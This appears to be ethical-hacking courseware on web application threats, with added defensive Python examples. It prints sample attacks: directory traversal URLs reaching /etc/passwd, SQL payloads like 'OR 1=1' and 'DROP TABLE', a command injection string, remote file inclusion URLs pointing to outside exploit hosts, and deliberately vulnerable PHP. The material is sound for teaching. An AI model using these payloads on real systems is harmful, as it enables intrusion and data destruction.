It is necessary to define how the system or network should behave when an error occurs. Otherwise, it may provide a chance for the attacker to break into the system. Improper error handling may lead to DoS attacks.

Log Tampering
Logs are maintained by web applications to track usage patterns such as user login credentials, admin login credentials, etc. Attackers usually inject, delete, or tamper with web application logs so that they can perform malicious actions or hide their identities.

Buffer Overflow
A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size.

Broken Session Management
When security-sensitive credentials such as passwords and other useful material are not properly taken care of, these types of attacks occur. Attackers compromise the credentials through these security vulnerabilities.

Security Misconfiguration
Developers and network administrators should check that the entire stack is configured properly, or security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Missing patches, misconfigurations, use of default accounts, etc. can be detected with the help of automated scanners, which attackers exploit to compromise web application security.

Broken Account Management
Even authentication schemes that are valid are weakened because of vulnerable account management functions, including account update, forgotten or lost password recovery or reset, password changes, and other similar functions.

Insecure Storage
Web applications need to store sensitive information such as passwords, credit card numbers, account records, or other authentication information somewhere, possibly in a database or on a file system. If proper security is not maintained for these storage locations, then the web application may be at risk, as attackers can access the storage and misuse the information stored. Insecure storage of keys, certificates, and passwords allows the attacker to gain access to the web application as a legitimate user.
Web Application Threats - 2

Platform Exploits
Various web applications are built by using different platforms such as BEA WebLogic and ColdFusion. Each platform has various vulnerabilities and exploits associated with it.

Insecure Direct Object References
When various internal implementation objects such as a file, directory, database record, or key are exposed through a reference by a developer, an insecure direct object reference takes place. For example, where a bank account number is made a primary key, there is a good chance it can be compromised by the attacker based on such references.

Insecure Cryptographic Storage
When sensitive data has been stored in the database, it has to be properly encrypted using cryptography. A few cryptographic encryption methods developed by developers are not up to par. Cryptographically very strong encryption methods have to be used. At the same time, care must be taken in storing the cryptographic keys. If these keys are stored in insecure places, then the attacker can obtain them easily and decrypt the sensitive data.
Authentication Hijacking
In order to identify the user, every web application uses user identification such as a user ID and password. Once the attacker compromises the system, various malicious things like theft of services, session hijacking, and user impersonation can occur.

Network Access Attacks
Network access attacks can majorly impact web applications. These can have an effect on the basic level of services within an application and can allow access that standard HTTP application methods would not have access to.

Cookie Snooping
Attackers use cookie snooping on a victim's system to analyze their surfing habits and sell that information to other attackers, or may use this information to launch various attacks on the victim's web applications.

Web Services Attacks
Web services are process-to-process communications that have special security issues and needs. An attacker injects a malicious script into a web service and is able to disclose and modify application data.

Insufficient Transport Layer Protection
SSL/TLS authentication should be used for authentication on websites, or the attacker can monitor network traffic to steal an authenticated user's session cookie. Various threats such as account theft, phishing attacks, and compromised admin accounts may follow after systems have been compromised.

Hidden Manipulation
These types of attacks are mostly used by attackers to compromise e-commerce websites. Attackers manipulate the hidden fields and change the data stored in them. Several online stores face this type of problem every day. Attackers can alter prices and conclude transactions with the prices of their choice.

DMZ Protocol Attacks
The DMZ (Demilitarized Zone) is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network. An attacker who is able to compromise a system that allows other DMZ protocols has access to other DMZs and internal systems. This level of access can lead to:

- Compromise of the web application and data
- Defacement of websites
- Access to internal systems, including databases, backups, and source code

Unvalidated Redirects and Forwards
Attackers make a victim click an unvalidated link that appears to be a valid site. Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass leading to:

- Session fixation attacks
- Security management exploits
- Failure to restrict URL access
- Malicious file execution

Failure to Restrict URL Access
An application often safeguards or protects sensitive functionality and prevents the display of links or URLs for protection. Attackers access those links or URLs directly and perform illegitimate operations.

Obfuscation Application
Attackers usually work hard at hiding their attacks to avoid detection. Network and host intrusion detection systems (IDSs) are constantly looking for signs of well-known attacks, driving attackers to seek different ways to remain undetected. The most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, or URL encoding. Unicode is a method of representing letters, numbers, and special characters so these characters can be displayed properly, regardless of the application or underlying platform in which they are used.

Security Management Exploits
Some attackers target security management systems, either on networks or on the application layer, in order to modify or disable security enforcement. An attacker who exploits security management can directly modify protection policies, delete existing policies, add new policies, and modify applications, system data, and resources.

Session Fixation Attack
In a session fixation attack, the attacker tricks or attracts the user to access a legitimate web server using an explicit session ID value.

Malicious File Execution
Malicious file execution vulnerabilities have been found in most applications. The cause of this vulnerability is unchecked input into the web server. Due to this unchecked input, the attackers' files are easily executed and processed on the web server. In addition, the attacker performs remote code execution, installs a rootkit remotely, and in at least some cases takes complete control over the systems.
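The obfuscation passage above describes attacks hidden behind Unicode, UTF-8 or URL encoding. As an added example that is not part of the module, the following filter canonicalizes a request value before matching it against signatures, so a single encoded, double-encoded or full-width form of an input cannot slip past a check that only looks at the raw bytes. The signature list and the sample inputs are constructed for illustration.

```python
import unicodedata
from urllib.parse import unquote

# Bound the decode loop so nested encodings cannot stall the filter.
MAX_DECODE_ROUNDS = 3

# Constructed signature list for illustration: the directory traversal and
# script-injection markers discussed in this module.
SIGNATURES = ("../", "<script")


def canonicalize(value):
    """Reduce a request parameter to one canonical form before any filtering
    decision: URL-decode repeatedly until the value stops changing (this
    catches double encoding such as %252e -> %2e -> .), then apply Unicode
    NFKC so compatibility characters such as full-width '.' and '/' fold to
    their ASCII equivalents."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return unicodedata.normalize("NFKC", value)


def is_encoded_form(value):
    """True when canonicalizing changes the value, i.e. the client sent an
    encoded representation. Worth logging even when no signature fires."""
    return canonicalize(value) != value


def matches_signature(value, canonical=True):
    """Return the first signature found in the value, or None.

    canonical=False inspects the raw bytes, which is what a naive IDS does
    and what the obfuscation described in the text relies on; canonical=True
    runs the same check on the canonical form."""
    haystack = canonicalize(value) if canonical else value
    lowered = haystack.lower()
    for sig in SIGNATURES:
        if sig in lowered:
            return sig
    return None


if __name__ == "__main__":
    # Constructed sample values: the same traversal marker in four encodings.
    for sample in ("../config", "%2e%2e%2fconfig",
                   "%252e%252e%252fconfig", "\uff0e\uff0e\uff0fconfig"):
        print(repr(sample), "raw:", matches_signature(sample, canonical=False),
              "canonical:", matches_signature(sample))
```

Only the plain form is caught on raw bytes; after canonicalization all four forms match the same signature.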
Unvalidated Input

An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc. that result in data theft and system malfunctioning. Input validation flaws refer to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers.

An input validation flaw refers to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers. Sites try to protect themselves from malicious attacks through input filtration, but there are various methods prevailing for the purpose of encoding. Many HTTP inputs have multiple formats that make filtering very difficult. The canonicalization method is used to simplify the encodings and is useful in avoiding various vulnerable attacks. Web applications that use only a client-side mechanism for input validation can easily be bypassed by attackers. In order to bypass the security system, attackers tamper with the HTTP requests, URLs, headers, form fields, hidden fields, and query strings. Users' login IDs and other related data get stored in the cookies, and this becomes a source of attack for intruders. Attackers gain access to the systems by using the information present in the cookies. Various methods used by hackers are SQL injection, cross-site scripting (XSS), buffer overflows, format string attacks, cookie poisoning, and hidden field manipulation, which result in data theft and system malfunctioning.

Figure 13.5: Unvalidated Input

Browser post request: http://juggyboy.com/login.aspx?user=jasons&pass=springfield

Browser input not validated by the web application; the modified query is built directly from the request fields:

string sql = "select * from Users where user='" + User.Text + "' and pwd='" + Password.Text + "'";
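The figure's login query pastes the browser fields straight into the SQL text. As an added example that is not part of the module, the block below runs that concatenated form beside a parameterized form against a constructed in-memory SQLite table, showing that a single quote in the input changes the structure of the concatenated statement while the bound-parameter version treats the same input purely as data. The user table and passwords are constructed for illustration; the plaintext pwd column only mirrors the slide's query.

```python
import sqlite3

# Constructed sample users (not from the original page). A real application
# would store password hashes, not the plaintext the slide's query compares.
USERS = [("jasons", "springfield"), ("o'brien", "hunter2")]


def make_db():
    """Create an in-memory database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (user TEXT PRIMARY KEY, pwd TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", USERS)
    return conn


def login_concat(conn, user, pwd):
    """The slide's pattern: the browser input becomes part of the SQL text,
    so any quote character in the input changes the statement itself."""
    sql = ("select * from Users where user='" + user
           + "' and pwd='" + pwd + "'")
    return conn.execute(sql).fetchone() is not None


def login_param(conn, user, pwd):
    """Hardened form: the statement text is fixed and the input travels as
    bound parameters, so it can only ever be compared as a value."""
    sql = "select * from Users where user=? and pwd=?"
    return conn.execute(sql, (user, pwd)).fetchone() is not None


def compare(user, pwd):
    """Run both versions on the same input and report each outcome: True or
    False when the query ran, or the exception class name if it broke."""
    conn = make_db()
    results = {}
    for name, fn in (("concat", login_concat), ("param", login_param)):
        try:
            results[name] = fn(conn, user, pwd)
        except sqlite3.Error as exc:
            results[name] = type(exc).__name__
    return results


if __name__ == "__main__":
    # A legitimate login behaves the same either way; a name containing a
    # quote breaks the concatenated statement but not the parameterized one.
    print(compare("jasons", "springfield"))
    print(compare("o'brien", "hunter2"))
```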
Parameter/Form Tampering

A web parameter tampering attack involves the manipulation of parameters exchanged between client and server in order to modify application data such as user credentials and permissions, price, and quantity of products. A parameter tampering attack exploits vulnerabilities in integrity and logic validation mechanisms that may result in XSS, SQL injection, etc.

Parameter tampering is a simple form of attack aimed directly at the application's business logic. This attack takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker can change these parameters.

Detailed Description

Serving the requested files is the main function of web servers. During a web session, parameters are exchanged between the web browser and the web application in order to maintain information about the client's session, which eliminates the need to maintain a complex database on the server side. URL queries, form fields, and cookies are used to pass the parameters. Changed parameters in the form field are the best example of parameter tampering. When a user selects an HTML page, it is stored as a form field value and transferred as an HTTP page to the web application. These values may be pre-selected (combo box, check box, radio buttons, etc.), free text, or hidden. An attacker can manipulate these values. In some extreme cases, it is just like saving the page, editing the HTML, and reloading the page in the web browser.

(Slide screenshots: tampering with the URL parameters; other parameters can be changed, including attribute parameters. See Figure 13.6.)
  • 37. Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures Hacking Web Applications Hidden fields th a t are invisible to the end user provide inform ation status to the web application. For exam ple, consider a product order form th a t includes the hidden field as follow s: < in p u t ty p e = "h id d e n " n a m e = "p ric e " v a lu e = "9 9 . 90"> Combo boxes, check boxes, and radio buttons are examples o f pre-selected param eters used to transfer inform ation betw een d iffe re n t pages, w hile allow ing the user to select one o f several predefined values. In a param eter tam pering attack, an attacker may m anipulate these values. For exam ple, consider a form th a t includes the com bo box as follow s: <FORM METHOD=POST AC TIO N ="xferM oney. a sp ‫״‬ > Source A c c o u n t: <SELECT NAME="SrcAcc"> <OPTION VALUE=" 1 2 3 4 5 6 7 8 9 "> ******7 8 9</OPTION> <OPTION V A LU E ="868686868">******868</O P TIO N X /S E LE C T> <BR>Amount: <INPUT NAME="Amount" SIZE=20> < B R > D e s tin a tio n A c c o u n t: <INPUT NAME="DestAcc" SIZE=40> <BRXINPUT TYPE=SUBMIT> <INPUT TYPE=RESET> </FORM> Bypassing An attacker may bypass the need to choose betw een tw o accounts by adding another account into the HTML page source code. The new com bo box is displayed in the w eb brow ser and the attacker can choose the new account. HTML form s subm it th e ir results using one o f tw o m ethods: GET or POST. In the GET m ethod, all form param eters and th e ir values appear in the query string o f the next URL, which the user sees. An attacker may tam per w ith this query string. For exam ple, consider a w eb page th a t allows an authenticated user to select one o f his or her accounts from a com bo box and debit the account w ith a fixed unit am ount. 
When the submit button is pressed in the web browser, the URL is requested as follows:

    http://www.juggybank.com/cust.asp?profile=21&debit=2500

An attacker may change the URL parameters (profile and debit) in order to debit another account:

    http://www.juggybank.com/cust.asp?profile=82&debit=1500

There are other URL parameters that an attacker can modify, including attribute parameters and internal modules. Attribute parameters are unique parameters that characterize the behavior of the uploading page. For example, consider a content-sharing web application that enables the content creator to modify content, while other users can only view the content. The web server checks whether the user who is accessing an entry is the author or not (usually by cookie). An ordinary user will request the following link:

    http://www.juggybank.com/stat.asp?pg=531&status=view
An attacker can modify the status parameter to "delete" in order to delete permission for the content.

    http://www.juggybank.com/stat.asp?pg=147&status=delete

Parameter/form tampering can lead to theft of services, escalation of access, session hijacking, and assuming the identity of other users, as well as parameters allowing access to developer and debugging information.

[Figure 13.6: Form Tampering. Tampering with the URL parameters (cust.asp?profile=21&debit=2500 changed to profile=82&debit=1500); other parameters can be changed, including attribute parameters (stat.asp?pg=531&status=view changed to pg=147&status=delete).]
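The defence against both tampering cases above is the same: the server treats profile, debit, pg and status as untrusted input and decides what is allowed from the identity established at login, not from the values in the URL. The following is an added example written for this page, not code from the courseware; the account owners, balances and page authors are constructed in-memory fixtures standing in for the session store and database.

```python
# Added example (not from the CEH courseware): server-side authorization for
# the profile/debit and pg/status URL parameters discussed above. Account
# ownership, balances and page authorship are constructed in-memory fixtures;
# in a real application they come from the session store and database.
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit


class Forbidden(Exception):
    """Raised when the session user is not allowed to act on the object."""


@dataclass(frozen=True)
class Session:
    user: str          # identity established at login, never taken from the URL


# Constructed fixtures.
ACCOUNT_OWNER = {21: "alice", 82: "bob"}      # profile id -> owning user
BALANCE = {21: 5000, 82: 3000}                # profile id -> balance
PAGE_AUTHOR = {531: "alice", 147: "bob"}      # pg id -> content author


def debit_account(session, profile, amount, owners=ACCOUNT_OWNER, balances=BALANCE):
    """cust.asp?profile=<id>&debit=<amount>: the profile id is untrusted
    client input, so it is honoured only if the session user owns it."""
    if owners.get(profile) != session.user:
        raise Forbidden(f"{session.user} does not own profile {profile}")
    if amount <= 0 or amount > balances[profile]:
        raise ValueError(f"invalid debit amount {amount}")
    return balances[profile] - amount     # new balance (no state mutated here)


def content_action(session, pg, status, authors=PAGE_AUTHOR):
    """stat.asp?pg=<id>&status=<view|delete>: 'view' is open to everyone,
    'delete' is granted by authorship, not by the status value sent."""
    if status not in ("view", "delete"):
        raise ValueError(f"unknown status {status!r}")
    if status == "delete" and authors.get(pg) != session.user:
        raise Forbidden(f"{session.user} is not the author of page {pg}")
    return status


def handle_request(session, url):
    """Dispatch one of the two URLs from the text to its checked handler."""
    parts = urlsplit(url)
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if parts.path.endswith("/cust.asp"):
        return debit_account(session, int(q["profile"]), int(q["debit"]))
    if parts.path.endswith("/stat.asp"):
        return content_action(session, int(q["pg"]), q["status"])
    raise ValueError(f"unknown endpoint {parts.path}")


def is_rejected(session, url):
    """True if the request is refused (authorization or validation failure)."""
    try:
        handle_request(session, url)
    except (Forbidden, ValueError):
        return True
    return False


if __name__ == "__main__":
    alice = Session("alice")
    print(handle_request(alice, "http://www.juggybank.com/cust.asp?profile=21&debit=2500"))
    print(is_rejected(alice, "http://www.juggybank.com/cust.asp?profile=82&debit=1500"))
```

With this structure the tampered request profile=82 from alice's session is refused before any balance is touched, and status=delete on a page someone else wrote is refused regardless of how the client edited the parameter. The same pattern covers the combo-box case: an account number added to the form by the attacker is still checked against ownership on the server.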
Directory Traversal

When access is provided outside a defined application, there exists the possibility of unintended information disclosure or modification. Complex applications exist as application components and data, which are typically configured in multiple directories. An application has the ability to traverse these multiple directories to locate and execute the legitimate portions of an application. A directory traversal/forceful browsing attack occurs when the attacker is able to browse for directories and files outside the normal application access. A directory traversal/forceful browsing attack exposes the directory structure of an application, and often the underlying web server and operating system. With this level of access to the web application architecture, an attacker can:

- Enumerate the contents of files and directories
- Access pages that otherwise require authentication (and possibly payment)
- Gain secret knowledge of the application and its construction
- Discover user IDs and passwords buried in hidden files
- Locate source code and other interesting files left on the server
- View sensitive data, such as customer information
The following example steps back several directories and obtains a file containing a backup of the web application:

    http://www.targetsite.com/../../../sitebackup.zip

This example obtains the "/etc/passwd" file from a UNIX/Linux system, which contains user account information:

    http://www.targetsite.com/../../../../etc/passwd

Let us consider another example where an attacker tries to access files located outside the web publishing directory using directory traversal:

    http://www.juggyboy.com/process.aspx=../../some dir/some file
    http://www.juggyboy.com/../../../../some dir/some file

[Figure 13.7: Directory Traversal. The attacker sends /../../../etc/passwd to a vulnerable server whose PHP code builds a file path from a request parameter ($theme = 'Jason.php' ...); the server responds with the password file (root:a98b24a1d3e8:0:1:System Operator:/:/bin/ksh, daemon:*:1:1::/tmp:, Jason:a3b698a76f76d57.:182:100:Developer:/home/users/Jason/:/bin/csh).]
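The server-side fix for every request shape shown above is the same: decode the client-supplied name, normalise it, join it to the document root and refuse anything that no longer sits under that root. The following is an added example for this page, not code from the courseware; WEB_ROOT is an assumed document root, and the check is purely string-based so it runs without touching the disk (a real handler would additionally resolve symlinks with os.path.realpath).

```python
# Added example (not from the courseware): canonicalising a client-supplied
# file name before it is joined to the web root, so paths such as
# ../../../etc/passwd or their percent-encoded forms cannot leave the
# publishing directory. Purely string-based (posixpath) so it runs without
# touching the disk; WEB_ROOT is an assumed document root.
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"


class TraversalError(ValueError):
    """The requested path resolves outside the web root."""


def decode_fully(s, rounds=3):
    """Undo repeated percent-encoding (..%252F -> ..%2F -> ../)."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def safe_path(user_path, root=WEB_ROOT):
    """Return the absolute path under root that user_path denotes, or raise."""
    decoded = decode_fully(user_path).replace("\\", "/")
    if "\x00" in decoded:
        raise TraversalError("NUL byte in path")
    # normpath collapses "./" and "a/../b"; a leading ".." that climbs above
    # root survives normalisation and is caught by the prefix check below.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        raise TraversalError(f"{user_path!r} escapes {root}")
    return candidate


def is_safe(user_path, root=WEB_ROOT):
    """Convenience wrapper: True if the path stays inside the web root."""
    try:
        safe_path(user_path, root)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    for p in ("themes/Jason.php", "../../../etc/passwd", "..%252F..%252Fsitebackup.zip"):
        print(p, "->", is_safe(p))
```

Note the order of operations: decoding happens before normalisation, and the prefix test is done on the normalised absolute path rather than by searching the raw input for "../", which is what lets encoded, backslash and NUL-byte variants fall through in naive filters.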
Security Misconfiguration

Developers and network administrators should check that the entire stack is configured properly, since security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. For instance, if the server is not configured properly, it results in various problems that can affect the security of a website. The problems that lead to such instances include server software flaws, unpatched security flaws, unnecessary services being enabled, and improper authentication. A few of these problems can be detected easily with the help of automated scanners. Attackers can access default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access. All the unnecessary and unsafe features have to be taken care of, and it is best if they are completely disabled so that outsiders cannot make use of them for malicious attacks.
All the application-based files have to be taken care of through proper authentication and strong security methods, or crucial information can be leaked to the attackers. Examples of unnecessary features that should be disabled or changed include:

- The application server admin console is automatically installed and not removed
- Default accounts are not changed
- Attacker discovers the standard admin pages on the server, logs in with default passwords, and takes over
Injection Flaws

Injection flaws are the loopholes in the web application that allow unreliable data to be interpreted and executed as part of a command or query. Injection flaws are exploited by the attacker by constructing malicious commands or queries that result in loss of data or corruption, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. These flaws can be detected easily by application vulnerability scanners and fuzzers. By exploiting the flaws in the web application, the attacker can easily read, write, delete, and update any data, whether relevant or irrelevant to that particular application. There are many types of injection flaws; some of them are as follows:

SQL injection

SQL injection is the most common website vulnerability on the Internet. It is the technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. In this attack, the attacker injects malicious SQL queries into the user input form, usually to gain unauthorized access to a database or to retrieve information directly from the database.

Command injection

Command injection flaws are another type of web application vulnerability. These flaws are highly dangerous. In this type of attack, the attacker injects malicious code via a web application.

LDAP injection

LDAP injection is an attack method in which a website that constructs LDAP statements from user-supplied input is exploited for launching attacks. When an application fails to sanitize the user input, the LDAP statement can be modified with the help of a local proxy. This in turn results in the execution of arbitrary commands, such as granting access to unauthorized queries and altering the content inside the LDAP tree.
SQL Injection Attacks

SQL injection attacks use command sequences from Structured Query Language (SQL) statements to control database data directly. Applications often use SQL statements to authenticate users to the application, validate roles and access levels, store and obtain information for the application and user, and link to other data sources. Using SQL injection methods, an attacker can use a vulnerable web application to avoid normal security measures and obtain direct access to valuable data.

The reason why SQL injection attacks work is that the application does not properly validate input before passing it to a SQL statement. For example, the following SQL statement,

    SELECT * FROM tablename WHERE UserID = 2302

becomes the following with a simple SQL injection attack:

    SELECT * FROM tablename WHERE UserID = 2302 OR 1=1

The expression "OR 1=1" evaluates to the value "TRUE," often allowing the enumeration of all user ID values from the database. SQL injection attacks can often be entered from the address bar, from within application fields, and through queries and searches. SQL injection attacks can allow an attacker to:

- Log in to the application without supplying valid credentials
- Perform queries against data in the database, often even data to which the application would not normally have access
- Modify the database contents, or drop the database altogether
- Use the trust relationships established between the web application components to access other databases

SQL injection vulnerable server code:

    <?php
    function saveemail($user, $message)
    {
        $sql = "INSERT INTO Messages (
            user, message
        ) VALUES (
            '$user', '$message'
        )";
        return mysql_query($sql);
    }
    ?>

[Figure 13.8: SQL Injection Attacks. Through the web browser the attacker submits test');DROP TABLE Messages;-- to the vulnerable server code above; when this code is sent to the database server, it drops the Messages table. A second payload, test'),('user2','I am Jason'),('user3','You are hacked, inserts spammy data on behalf of other users.]

Note: For complete coverage of SQL injection concepts and techniques, refer to Module 14: SQL Injection.
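Both of the problems above come from building the statement text out of user input. The following is an added example for this page, not code from the courseware: it runs the "OR 1=1" and "DROP TABLE" payloads from this section against an in-memory SQLite database, once through string concatenation (the pattern of the PHP function above) and once through parameterised queries. The tables and rows are constructed here, and executescript stands in for a driver that accepts stacked statements.

```python
# Added example (not from the courseware): the "OR 1=1" and "DROP TABLE"
# payloads from this section run against an in-memory SQLite database, first
# through string concatenation (the pattern of the vulnerable PHP function
# above) and then through parameterised queries. The tables and rows are
# constructed here; executescript stands in for a driver that accepts
# stacked statements.
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Messages (user TEXT, message TEXT)")
    con.executemany("INSERT INTO Messages VALUES (?, ?)",
                    [("alice", "hi"), ("bob", "hello")])
    con.execute("CREATE TABLE users (UserID INTEGER, name TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [(2302, "alice"), (2303, "bob"), (2304, "carol")])
    return con


def lookup_user_vulnerable(con, user_id):
    # The client value becomes SQL syntax: "2302 OR 1=1" matches every row.
    sql = "SELECT name FROM users WHERE UserID = " + str(user_id)
    return sorted(r[0] for r in con.execute(sql))


def lookup_user_safe(con, user_id):
    # The value travels separately from the statement text and is never
    # parsed as SQL; "2302 OR 1=1" simply fails to equal any UserID.
    rows = con.execute("SELECT name FROM users WHERE UserID = ?", (user_id,))
    return sorted(r[0] for r in rows)


def saveemail_vulnerable(con, user, message):
    # Same construction as the PHP above: quotes in the input close the
    # literal and whatever follows is executed as SQL.
    sql = f"INSERT INTO Messages (user, message) VALUES ('{user}', '{message}')"
    con.executescript(sql)


def saveemail_safe(con, user, message):
    con.execute("INSERT INTO Messages (user, message) VALUES (?, ?)",
                (user, message))


def table_exists(con, name):
    row = con.execute(
        "SELECT count(*) FROM sqlite_master WHERE type='table' AND name=?",
        (name,)).fetchone()
    return row[0] == 1


def messages(con):
    return [r[0] for r in con.execute("SELECT message FROM Messages")]


if __name__ == "__main__":
    con = make_db()
    print(lookup_user_vulnerable(con, "2302 OR 1=1"))   # every user
    print(lookup_user_safe(con, "2302 OR 1=1"))         # nobody
    saveemail_vulnerable(con, "alice", "x');DROP TABLE Messages;--")
    print("Messages still exists:", table_exists(con, "Messages"))
```

The parameterised versions are not filtering anything: the payload is stored verbatim as a message, which is the correct outcome. The point is that the database never sees it as part of the statement, so input validation can be reserved for business rules rather than being the only thing between the request and the schema.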
Command Injection Attacks

Command injection flaws allow attackers to pass malicious code to different systems via a web application. The attacks include calls to the operating system over system calls, use of external programs over shell commands, and calls to the backend databases over SQL. Scripts written in Perl, Python, and other languages can be injected into poorly designed web applications and executed. If a web application uses any type of interpreter, attacks are inserted to inflict damage. To perform functions, web applications must use operating system features and external programs. Although many programs are invoked externally, the most frequently used one is Sendmail.

When a piece of information is passed through the HTTP external request, it must be carefully scrubbed, or the attacker can insert special characters, malicious commands, and command modifiers into the information. The web application then blindly passes these characters to the external system for execution. SQL injection is a dangerous and rather widespread form of command injection. Command injection attacks are easy to carry out and discover, but they are tough to understand.

Shell Injection

To complete various functionalities, web applications use various applications and programs, for example sending an email by using the UNIX sendmail program. There is a chance that an attacker may inject code into these programs. This kind of attack is dangerous, especially to web page security. These injections allow intruders to perform various types of malicious attacks against the user's server. An attacker tries to craft an input string to gain shell access to a web server. Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs.

HTML Embedding

This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application. In HTML embedding attacks, user input to a web script is placed into the output HTML, without being checked for HTML code or scripting.

File Injection

The attacker exploits this vulnerability and injects malicious code into system files:

    http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit

Users are allowed to upload various files on the server through various applications, and those files can be accessed through the Internet from any part of the world. If the application ends with a php extension and any user requests it, then the application interprets it as a php script and executes it. This allows an attacker to perform arbitrary commands.
Command Injection Example

The following is an example of command injection. The form at http://juggyboy/cgi-bin/lspro/lspro.cgi?hit_out=1036 has the fields User Name (Addison), Email Address (addi@juggyboy.com), Site URL (www.juggyboy.com), Banner URL, and Password (newpassword). Poor input validation in the server script was exploited in this attack, which uses the database INSERT and UPDATE record command. The attacker enters the following into the Banner URL field:

    www.juggyboy.com/banner.gif|newpassword|1036|60|468

- To perform a command injection attack, the attacker first enters malicious code (account number) with a new password.
- The last two sets of numbers are the banner size.
- Once the attacker clicks the submit button, the password for the account 1036 is changed to "newpassword."
- The server script assumes that only the URL of the banner image file is inserted into that field.

[Figure 13.9: Command Injection Example (the lspro.cgi form and the malicious Banner URL value described above).]
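The two failure modes in this section, a shell interpreting part of an address handed to sendmail and a record format interpreting a "|" inside the Banner URL as a field separator, have the same remedy: never let user data reach an interpreter as unquoted syntax. The following is an added example for this page, not code from the courseware: it shows the weak pattern and the hardened one for each case. Nothing is executed; the mail functions return the command they would run, and the field names and sendmail path are assumptions.

```python
# Added example (not from the courseware): defences for the two situations in
# this section, shown beside the weak pattern. (1) An address handed to
# sendmail is validated and passed as its own argv element, so no shell ever
# parses it. (2) The pipe-delimited record of the lspro example is written
# with quoting and a fixed field count, so a "|" inside the Banner URL stays
# data. Nothing is executed; the mail functions return the command they would
# run. Field names and the sendmail path are assumptions.
import csv
import io
import re

# Local part may not start with "-", so the argv element can never look like
# an option to the program that receives it.
ADDRESS_RE = re.compile(
    r"^[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$")
SENDMAIL = "/usr/sbin/sendmail"
FIELD_NAMES = ("name", "email", "site_url", "banner_url", "password")


def mail_command_vulnerable(to_addr):
    # One string for system(): ";", "|", "`" and friends are shell syntax.
    return SENDMAIL + " " + to_addr


def is_valid_address(to_addr):
    return ADDRESS_RE.match(to_addr) is not None


def mail_command_safe(to_addr):
    """argv list for subprocess.run(argv) with shell=False: the address is a
    single argument whatever it contains, and it must pass validation."""
    if not is_valid_address(to_addr):
        raise ValueError(f"rejected address {to_addr!r}")
    return [SENDMAIL, to_addr]


def build_record_vulnerable(fields):
    # Values joined with "|" unchecked: a "|" in any value adds fields.
    return "|".join(fields[n] for n in FIELD_NAMES)


def parse_record_vulnerable(line):
    return line.split("|")


def build_record_safe(fields):
    """Quote every value and refuse line breaks, so the delimiter inside a
    value cannot change the record's shape."""
    for n in FIELD_NAMES:
        if "\n" in fields[n] or "\r" in fields[n]:
            raise ValueError(f"line break in field {n}")
    buf = io.StringIO()
    writer = csv.writer(buf, delimiter="|", quoting=csv.QUOTE_ALL, lineterminator="")
    writer.writerow([fields[n] for n in FIELD_NAMES])
    return buf.getvalue()


def parse_record_safe(line):
    values = next(csv.reader([line], delimiter="|"))
    if len(values) != len(FIELD_NAMES):
        raise ValueError(f"expected {len(FIELD_NAMES)} fields, got {len(values)}")
    return dict(zip(FIELD_NAMES, values))


if __name__ == "__main__":
    form = {"name": "Addison", "email": "addi@juggyboy.com",
            "site_url": "www.juggyboy.com", "password": "newpassword",
            "banner_url": "www.juggyboy.com/banner.gif|newpassword|1036|60|468"}
    print(parse_record_vulnerable(build_record_vulnerable(form)))   # 9 fields
    print(parse_record_safe(build_record_safe(form))["banner_url"])  # intact
```

A server that stores the quoted form and checks the field count on the way back cannot have its password column overwritten by the banner field, because the extra "|"-separated values never become columns. The argv rule is the general one for external programs: with a list and no shell, characters such as ";" have no meaning, and the allowlist regex limits what can reach the program even so.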
File Injection Attack

Users are allowed to upload various files on the server through various applications, and those files can be accessed through the Internet from anywhere in the world. If the application ends with a php extension and any user requests it, then the application interprets it as a php script and executes it. This allows an attacker to perform arbitrary commands. File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system.

Consider the following client code running in a browser:

    <form method="get">
    <select name="DRINK">
    <option value="pepsi">pepsi</option>
    <option value="coke">coke</option>
    </select>
    <input type="submit">
    </form>

Vulnerable PHP code:

    <?php
    $drink = 'coke';
    if (isset($_GET['DRINK']))
        $drink = $_GET['DRINK'];
    require($drink . '.php');
    ?>

To exploit the vulnerable PHP code, the attacker injects a remotely hosted file at www.jasoneval.com containing an exploit.

Exploit code:

    http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?
